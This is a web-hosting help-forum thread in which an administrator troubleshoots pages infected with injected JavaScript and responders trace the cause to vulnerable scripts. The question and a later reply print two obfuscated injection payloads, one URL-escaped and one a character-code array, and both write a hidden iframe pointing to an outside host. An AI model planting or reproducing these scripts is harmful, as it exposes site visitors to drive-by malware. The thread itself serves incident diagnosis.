• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 777
  • Last Modified:

proftpd sql injection cross site scripting

recently on the webserver, i noticed a lot of pages being infected with this code.

<script type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%73%73%2E%63%6F%6D%2F%63%6F%75%6E%74%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3
D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>

http://bugs.proftpd.org/show_bug.cgi?id=3115


i upgraded  proftpd from 1.3.1 to 1.3.2, but the pages do get infected again, I ran audit on the webserver directory, which shows thats the process is proftpd itself which alters the file, so the update did not fix the issue.

type=SYSCALL msg=audit(1235325508.686:71929): arch=40000003 syscall=5 success=yes exit=10 a0=814ad4c a1=8241 a2=1b6 a3=8241 items=1 ppid=25144 pid=5065 auid=4294967295 uid=0 gid=1012 euid=6537 suid=6537 fsuid=6537 egid=1012 sgid=1012 fsgid=1012 tty=(none) comm="proftpd" exe="/usr/local/sbin/proftpd" key=(null)
type=CWD msg=audit(1235325508.686:71929):  cwd="/user/public_html"
type=PATH msg=audit(1235325508.686:71929): item=0 name="/user/public_html/index.html" inode=203182030 dev=08:07 mode=0100644 ouid=6537 ogid=1012 rdev=00:00


following is the proftpd.conf, but its copied from proftpd 1.3.1

anyone had a fix for this?
#
# usr/local/etc/proftpd/proftpd.conf -- This is a basic ProFTPD configuration file.
# To really apply changes reload proftpd after modifications.
# 
 
Include /usr/local/etc/proftpd/modules.conf
 
ServerName			"Reseller System FTP Server"
ServerType			standalone
DeferWelcome			on
 
MultilineRFC2228		on
DefaultServer			on
ShowSymlinks			on
 
TimeoutNoTransfer		600
TimeoutStalled			600
TimeoutIdle			1200
 
DisplayLogin                    welcome.msg
DisplayChdir                    .message
ListOptions                	"-l"
RequireValidShell		off
 
DefaultRoot			~
IdentLookups			off
 
DenyFilter			\*.*/
 
SystemLog			/var/log/proftpd.log
 
# Uncomment this if you are using NIS or LDAP to retrieve passwords:
#PersistentPasswd		off
 
# Uncomment this if you would use TLS module:
#TLSEngine 			on
 
# Uncomment this if you would use quota module:
#Quotas				on
 
# Uncomment this if you would use ratio module:
#Ratios				on
 
# Port 21 is the standard FTP port.
DefaultAddress			0.0.0.0
Port				21
 
# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd)
MaxInstances			30
 
# Set the user and group that the server normally runs at.
User				nobody
Group				nogroup
 
# Umask 022 is a good standard umask to prevent new files and dirs
# (second parm) from being group and world writable.
Umask				022  022
# Normally, we want files to be overwriteable.
AllowOverwrite			on
 
# Allow CHOWN!
CapabilitiesEngine		on
CapabilitiesSet			+CAP_CHOWN
 
# Delay engine reduces impact of the so-called Timing Attack described in
# http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
# It is on by default. 
DelayEngine 			off
 
# SQL Authentication.
SQLAuthenticate			users userset
SQLAuthTypes			Crypt
SQLConnectInfo			server proftpd passwd PERSESSION
SQLUserInfo			web_users username crypt uid gid homedir NULL
SQLUserWhereClause		"activated = 'Y'"
#SQLLogFile			/var/log/proftpd-sql.log
 
# A basic anonymous configuration, no upload directories.
 
# <Anonymous ~ftp>
#   User				ftp
#   Group				nogroup
#   # We want clients to be able to login with "anonymous" as well as "ftp"
#   UserAlias			anonymous ftp
#   # Cosmetic changes, all files belongs to ftp user
#   DirFakeUser	on ftp
#   DirFakeGroup on ftp
# 
#   RequireValidShell		off
# 
#   # Limit the maximum number of anonymous logins
#   MaxClients			10
# 
#   # We want 'welcome.msg' displayed at login, and '.message' displayed
#   # in each newly chdired directory.
#   DisplayLogin			welcome.msg
#   DisplayFirstChdir		.message
# 
#   # Limit WRITE everywhere in the anonymous chroot
#   <Directory *>
#     <Limit WRITE>
#       DenyAll
#     </Limit>
#   </Directory>
# 
#   # Uncomment this if you're brave.
#   # <Directory incoming>
#   #   # Umask 022 is a good standard umask to prevent new files and dirs
#   #   # (second parm) from being group and world writable.
#   #   Umask				022  022
#   #            <Limit READ WRITE>
#   #            DenyAll
#   #            </Limit>
#   #            <Limit STOR>
#   #            AllowAll
#   #            </Limit>
#   # </Directory>
# 
# </Anonymous>
 
<VirtualHost xx.xx.xx.xx>
        ServerName                      "EIN"
        MaxClients                      10
        MaxLoginAttempts                1
        DeferWelcome                    off
        IdentLookups                    off
 
 
ShowSymlinks                    on
 
TimeoutNoTransfer               600
TimeoutStalled                  600
TimeoutIdle                     1200
 
DisplayLogin                    welcome.msg
DisplayChdir                    .message
ListOptions                     "-l"
RequireValidShell               off
 
DefaultRoot                     ~
IdentLookups                    off
 
DenyFilter                      \*.*/
 
        AllowOverwrite                  on
 
        <Limit LOGIN>
                AllowUser               cranx
                AllowUser               alpha
               AllowUser               value
                DenyAll
        </Limit>
 
	CapabilitiesEngine              on
	CapabilitiesSet                 +CAP_CHOWN
 
	SQLAuthenticate                 users userset
	SQLAuthTypes                    Crypt
	SQLConnectInfo                  server proftpd passwd PERSESSION
	SQLUserInfo                     users username crypt uid gid homedir NULL
	SQLUserWhereClause              "activated = 'Y'"
	#SQLLogFile                     /var/log/proftpd-sql.log
 
</VirtualHost>
 
<VirtualHost xx.xx.xx.xx>
        ServerName                      "Client"
        MaxClients                      20
        MaxLoginAttempts                1
        DeferWelcome                    off
        IdentLookups                    off
 
ShowSymlinks                    on
 
TimeoutNoTransfer               600
TimeoutStalled                  600
TimeoutIdle                     1200
 
DisplayLogin                    welcome.msg
DisplayChdir                    .message
ListOptions                     "-l"
RequireValidShell               off
 
DefaultRoot                     ~
IdentLookups                    off
 
DenyFilter                      \*.*/
 
        AllowOverwrite                  on
 
        <Limit LOGIN>
                AllowUser               user1
                AllowUser               user2
                DenyAll
        </Limit>
 
        CapabilitiesEngine              on
        CapabilitiesSet                 +CAP_CHOWN
 
        SQLAuthenticate                 users userset
        SQLAuthTypes                    Crypt
        SQLConnectInfo                  server proftpd passwd PERSESSION
        SQLUserInfo                     web_users username crypt uid gid homedir NULL
        SQLUserWhereClause              "activated = 'Y'"
        #SQLLogFile                     /var/log/proftpd-sql.log
 
</VirtualHost>

Open in new window

0
krisdigitx
Asked:
krisdigitx
  • 5
  • 5
  • 2
4 Solutions
 
ahoffmannCommented:
sounds like you're on a system with name-based virtual hosts, could it be that some of the other virtual hosts modify your files?
If you can ensure that the user running the proftpd process modifies the files, you need to update all proftpd instances on the host.
0
 
krisdigitxAuthor Commented:
its running as 'nobody'

root     14980 21498  0 14:12 pts/0    00:00:00 grep proftp
nobody   20818     1  0 10:54 ?        00:00:00 proftpd: (accepting connections)

0
 
Maciej SsysadminCommented:
It looks like your apache was compromised, not proftpd.
This:
<script type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6F%75%6E%74%73%73%2E%63%6F%6D%2F%63%6F%75%6E%74%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>
is in fact:
<script type="text/javascript">document.write('<iframe src="***MASKED*EXPLOIT*LINK***" width=1 height=1 style="visibility: hidden"></iframe>');</script>

Link you gave is about some other proftpd bug.

* EDIT by modus_in_rebus * Masked out the exploit link
0
Who's Defending Your Organization from Threats?

Protecting against advanced threats requires an IT dream team – a well-oiled machine of people and solutions working together to defend your organization. Download our resource kit today to learn more about the tools you need to build you IT Dream Team!

 
ahoffmannCommented:
what has this to do with apache?

Assuming that krisdigitx ensured that the files still contain this code (for example by inspecting the files on the server):
either the static files have been changed or the the content of the database from which the file content is generated have been modified.
Both is not a pache but most likely a web application problem (except the host itself have been compromised/hijacked).
0
 
krisdigitxAuthor Commented:
i didnt understand you earlier

but many of the sites are infected with javascript codes, also php on the server is php4, i will try update it to php5, but i dont know if this is the problem, the log shows that the files were altered by proftpd, it also could be other virtualhosts accessing the file, but it is not so, since it the same ftpuser for the website which logs in at the time of modification.
0
 
Maciej SsysadminCommented:
ahoffman: you are right - I wasn't precise with my comment - it can be website (webapplication) problem, not apache itself. Still - I don't think it is proftpd issue (which can be just used as a tool in intruder's hands).
0
 
ahoffmannCommented:
> .. many of the sites are infected
you mean the other virtual hosts on the same system?

> .. php5, but i dont know if this is the problem,
I don't assume so, most likely the problem is a vulnerable script somewhere.

> .. other virtualhosts accessing the file, but it is not so,
does this mean that each virtual site has its own unique login user *and* that proftpd switches to that unique user before touching any file?

silly question: did you check that the files are modified  on your system?
if so, how did you do that?
0
 
krisdigitxAuthor Commented:
checking the logs , i get these

suhosin[16129]: ALERT - maximum execution depth reached - script terminated (attacker '121.247.75.237', file '/var/ares/webweavers/web/webweavers/www.domain.com/public_html/admin/editor/filemanager/browser/default/connectors/php/io.php', line 54)
apache: Unauthorised client: Attempted login as user from xx.xx.yy.yy (xx.xx.yy.yy)

Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0oker/www.domain.com/public_html/index.php')
0
 
krisdigitxAuthor Commented:
> .. many of the sites are infected
you mean the other virtual hosts on the same system?
Yes

> .. other virtualhosts accessing the file, but it is not so,
does this mean that each virtual site has its own unique login user *and* that proftpd switches to that unique user before touching any file?
yes

silly question: did you check that the files are modified  on your system?
if so, how did you do that?

I ran auditctl on the server which shows what files have been changed and by whom
0
 
ahoffmannCommented:
you have suhosin running, sounds good
the logs also show that suhosin detects some hacking attempts (first entry), and that some script try to do forbidden things (all other lines)
I'd first disable these scripts, then inspect them.

You posts and comments prove what I assume, somehow: you have vulnerable scripts which are used to deface other pages.
0
 
krisdigitxAuthor Commented:
ok, i managed to get the scripts which were executing, do you think it must have affected other virtualhosts/websites too?

* EDIT by modus_in_rebus * Masked out exploit links

root@tripolis:/usr/src/hacked# cat index.php 
<script>a=new Array(59.76,104.61,101.82,113.66,96.97,108.8,100.76,31.66,114.66,113.65,98.78,60.8,33.69,103.6,115.99,115.63,111.96,57.6,46.9,46.88,99.89,97.74,50.71,50.9,102.73,52.94,51.9,99.72,54.62,54.69,105.93,45.79,98.7,109.76,46.86,98.68,102.97,104.62,44.74,97.64,104.67,109.93,46.84,104.76,109.93,99.83,100.79,119.9,45.84,98.7,102.78,104.73,62.85,114.9,103.63,101.99,101.85,33.94,31.71,118.88,104.63,99.65,115.68,103.74,60.82,48.94,31.82,103.79,100.96,104.97,102.83,103.64,115.91,60.68,48.81,31.84,114.91,115.6,120.75,107.75,100.71,60.93,33.89,117.97,104.84,114.93,104.96,97.69,104.87,107.68,104.98,115.91,120.74,57.66,31.66,103.96,104.6,99.89,99.76,100.96,109.86,33.6,61.61,59.77,46.68,104.82,101.62,113.6,96.83,108.77,100.76,61.94);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<html><body><p align=right><a href=***MASKED*EXPLOIT*LINK*2***><font face=Arial size=3 color=#000080>??????? ?????</font></a><font face="Arial" size="3" color="#000080">
| </font><font face=Arial size=3 color=#F0EEEC><a href=***MASKED*EXPLOIT*LINK*2***>?????</a></font></p><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<p align=right><a href=***MASKED*EXPLOIT*LINK*2***><font face=Arial size=3 color=#F0EEEC>ýýýýýýý ýýýýý</font></a></p>
<p align=right><font face=Arial size=3 color=#F0EEEC><a href=***MASKED*EXPLOIT*LINK*2***>ýýýýý</a></font></p>
<p align=right>&nbsp;</p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýý
ýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýý
ýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>video</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 color=#CECECE>ýýýýýýý</font></a></p>
</body></body></html>
root@tripolis:/usr/src/hacked#      

Open in new window

0
 
ahoffmannCommented:
this is just another script located on your server, but it does no damage on the server when called
0

Featured Post

Receive 1:1 tech help

Solve your biggest tech problems alongside global tech experts with 1:1 help.

  • 5
  • 5
  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now